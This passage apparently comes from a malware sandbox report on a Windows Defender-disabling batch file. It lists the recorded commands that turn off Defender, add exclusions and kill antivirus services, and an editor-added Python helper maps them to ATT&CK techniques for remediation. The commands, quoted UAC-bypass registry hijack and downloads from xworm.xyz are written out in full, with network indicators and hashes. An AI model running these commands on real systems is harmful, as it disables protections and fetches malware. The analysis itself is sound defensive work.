C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Roaming" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Local\Temp" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScheduledScan" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableTamperProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0 -PropertyType DWORD -Force"
C:\Windows\system32\sc.exe
sc stop mfevtp
C:\Windows\system32\sc.exe
sc config mfevtp start= disabled
C:\Windows\system32\sc.exe
sc stop mfefire
C:\Windows\system32\sc.exe
sc config mfefire start= disabled
C:\Windows\system32\sc.exe
sc stop mfehidk
C:\Windows\system32\sc.exe
sc config mfehidk start= disabled
C:\Windows\system32\sc.exe
sc stop mfeapfk
C:\Windows\system32\sc.exe
sc config mfeapfk start= disabled
C:\Windows\system32\sc.exe
sc stop mfeavfk
C:\Windows\system32\sc.exe
sc config mfeavfk start= disabled
C:\Windows\system32\sc.exe
sc stop mfefirek
C:\Windows\system32\sc.exe
sc config mfefirek start= disabled
C:\Windows\system32\sc.exe
sc stop avastsvc
C:\Windows\system32\sc.exe
sc config avastsvc start= disabled
C:\Windows\system32\sc.exe
sc stop avastui
C:\Windows\system32\sc.exe
sc config avastui start= disabled
C:\Windows\system32\sc.exe
sc stop nissrv
C:\Windows\system32\sc.exe
sc config nissrv start= disabled
C:\Windows\system32\sc.exe
sc stop Symantec AntiVirus
C:\Windows\system32\sc.exe
sc config "Symantec AntiVirus" start= disabled
C:\Windows\system32\sc.exe
sc stop ccSvcHst
C:\Windows\system32\sc.exe
sc config ccSvcHst start= disabled
C:\Windows\system32\sc.exe
sc stop NortonSecurity
C:\Windows\system32\sc.exe
sc config NortonSecurity start= disabled
C:\Windows\system32\sc.exe
sc stop Norton AntiVirus
C:\Windows\system32\sc.exe
sc config "Norton AntiVirus" start= disabled
C:\Windows\system32\taskkill.exe
taskkill /F /IM Mcafee
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcafee
C:\Windows\system32\taskkill.exe
taskkill /F /IM Mcafee.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcafee.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McUICnt.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McPltCmd.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcuihost.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McInstru.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM avastui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ccSvcHst.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mfefirek.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mfehidk.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM avastsvc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McUICnt.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McPltCmd.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ModuleCoreService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ZhuDongFangYu.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM 360Safe.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM 360Tray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ns.exe
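The process lists of behavioral1 and behavioral2 are identical, so one triage helper covers both. The following is an added example written by the editor; it is not code from the sandbox or from the sample. It tokenises the recorded command lines, maps each to an ATT&CK technique (the mapping is the editor's, not the report's) and pulls out the artefact a responder would revert: the registry value, service, scheduled task, killed image or download URL. `SAMPLE_CMDLINES` is a constructed subset of the lines listed under Processes. Three caveats the report does not spell out: `Set-MpPreference` has no `-DisableTamperProtection` parameter, so that call fails, and on a current client build Defender ignores `DisableAntiSpyware` and, with Tamper Protection on, rejects the other policy values and the `Features\TamperProtection` write, so the logged `reg add` calls alone do not prove protection was off; the process list records no `eventvwr.exe` launch, so the `mscfile` handler hijack was registered but not seen being triggered; and `taskkill /IM Mcafee` (no `.exe`) and the unquoted `sc stop Symantec AntiVirus` target names that match nothing, which the helper flags.

```python
"""Added triage example (editor's code, not part of the sandbox report).
Tokenises the command lines recorded under Processes, maps each to an ATT&CK
technique (editor's mapping) and extracts the artefact a responder must revert."""
import re
from collections import defaultdict

# Constructed subset of the command lines listed in the report above.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"',
    r'net session',
    r'reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f',
    r'bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat',
    r'''powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"''',
    r'sc stop WinDefend',
    r'sc config WinDefend start= disabled',
    r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Local\Temp" /t REG_SZ /d "" /f',
    r'powershell -Command "Set-MpPreference -DisableTamperProtection $true"',
    r'sc stop Symantec AntiVirus',
    r'taskkill /F /IM Mcafee',
    r'taskkill /F /IM avastui.exe',
]

TOKEN = re.compile(r'"[^"]*"|\S+')          # double-quoted arguments stay whole
URL = re.compile(r"https?://[^\s'\"]+")
HIVES = {"hkey_local_machine": "HKLM", "hkey_current_user": "HKCU"}

def tokens(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [t.strip('"') for t in TOKEN.findall(cmdline)]

def reg_add(args):
    """Parse the arguments after `reg add`: KEY [/v NAME | /ve] [/t TYPE] [/d DATA] [/f]."""
    hive, _, path = args[0].partition("\\")
    info = {"key": HIVES.get(hive.lower(), hive.upper()) + "\\" + path,
            "name": "(Default)", "data": None}
    for i, a in enumerate(args[1:], 1):
        if a.lower() == "/v" and i + 1 < len(args):
            info["name"] = args[i + 1]
        elif a.lower() == "/d" and i + 1 < len(args):
            info["data"] = args[i + 1]
    return info

def classify(cmdline):
    """Map one recorded command line to (ATT&CK technique ID, detail), or None."""
    toks = tokens(cmdline)
    if not toks:
        return None
    exe = toks[0].rsplit("\\", 1)[-1].lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    args, up, low = toks[1:], [a.upper() for a in toks[1:]], cmdline.lower()
    if exe == "net" and up[:1] == ["SESSION"]:
        # `net session` fails unless the shell is elevated: the batch file's admin check
        return ("T1548.002", "elevation check via `net session`")
    if exe == "reg" and up[:1] == ["ADD"]:
        r = reg_add(args[1:])
        where, k = f'{r["key"]}\\{r["name"]} = {r["data"]!r}', r["key"].lower()
        if "\\classes\\mscfile\\shell\\open\\command" in k:
            # .msc handler hijack: auto-elevated eventvwr.exe resolves this verb
            return ("T1548.002", "UAC bypass, mscfile handler: " + where)
        if "windows defender\\exclusions" in k:
            return ("T1562.001", "Defender exclusion: " + where)
        if "windows defender" in k:
            return ("T1562.001", "Defender setting: " + where)
        return ("T1112", "registry: " + where)
    if exe == "sc" and up[:1] == ["STOP"] and len(args) > 1:
        # sc takes one service name; an unquoted name with spaces is truncated
        note = "" if len(args) == 2 else f" (unquoted; sc sees only {args[1]!r})"
        return ("T1562.001", "service stopped: " + " ".join(args[1:]) + note)
    if exe == "sc" and up[:1] == ["CONFIG"] and "START=" in up:
        return ("T1562.001", f"service start type: {args[1]} -> {args[up.index('START=') + 1]}")
    if exe == "taskkill" and "/IM" in up:
        image = args[up.index("/IM") + 1]
        # /IM matches the full image name, so `Mcafee` without .exe kills nothing
        note = "" if "." in image else " (no extension: matches no image)"
        return ("T1562.001", f"taskkill: {image}{note}")
    if exe == "schtasks" and "/DISABLE" in up and "/TN" in up:
        return ("T1562.001", "task disabled: " + args[up.index("/TN") + 1])
    if exe == "bitsadmin" and "/DOWNLOAD" in up:
        return ("T1197", f"BITS download: {args[-2]} -> {args[-1]}")
    if exe == "powershell":
        if "invoke-webrequest" in low:
            return ("T1105", "PowerShell download: " + URL.search(cmdline).group(0))
        if "set-mppreference" in low:
            return ("T1562.001", "Set-MpPreference: " + " ".join(args[1:]))
        return ("T1059.001", " ".join(args))
    if exe == "cmd" and up[:1] in (["/C"], ["/K"]) and len(args) > 1:
        return ("T1059.003", "batch launched: " + args[1])
    return None

def triage(cmdlines):
    """Group findings by technique in order of first appearance."""
    report = defaultdict(list)
    for line in cmdlines:
        hit = classify(line)
        if hit:
            report[hit[0]].append(hit[1])
    return dict(report)

if __name__ == "__main__":
    for technique, details in triage(SAMPLE_CMDLINES).items():
        print(technique, *details, sep="\n    ")
```

Feed it the full process list from either run (one command line per element) and the `T1562.001` bucket becomes the revert list: re-enable and start the stopped services, re-enable the four Defender scheduled tasks, delete the `Policies\Microsoft\Windows Defender` values and the four `Exclusions\Paths` entries, and remove the `HKCU\Software\Classes\mscfile` key that the `T1548.002` bucket points at.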
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 193.114.54.198.in-addr.arpa | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
Files
memory/2760-0-0x00007FFF88FD3000-0x00007FFF88FD5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_deai02lx.qec.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2760-9-0x000001C47AB30000-0x000001C47AB52000-memory.dmp
memory/2760-10-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp
memory/2760-11-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp
memory/2760-12-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp
memory/2760-16-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
| MD5 | 03bf8860dbd0724e466baf1e1bca86b3 |
| SHA1 | bde4d3ef9ac846e1e83bea37f88097cd370d5197 |
| SHA256 | 968dc5ab087e7a593d9b2682c2f6ee8aa6fd756ae874328a12d892d2b68fd0af |
| SHA512 | 0f3f5492be21a3af8262363f3d593aa63080f2d2db574451d8b94d4f00c3c3f06cb17c5795e6cccef84e9ebe684062a51829139177f7539f6629373e56e2e92f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5e6baeec02c3d93dce26652e7acebc90 |
| SHA1 | 937a7b4a0d42ea56e21a1a00447d899a2aca3c28 |
| SHA256 | 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0 |
| SHA512 | 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1cebd15e19078003226326aa50667159 |
| SHA1 | 6d346e2ff9b8b6834a3e4b58240c41f5178e57f9 |
| SHA256 | ee661e2b1fa0a222a50eee925fae81512cc15faf5473a5740999e66f5eda4abe |
| SHA512 | 81ed3fd080d4e463514db6a6df8e54c24969ff8a2aea98f66153c12e0809b4e0429b2192f19afc1160ebe700c9774ce3e9e417ed3c2539e7bcbd996c94be75a4 |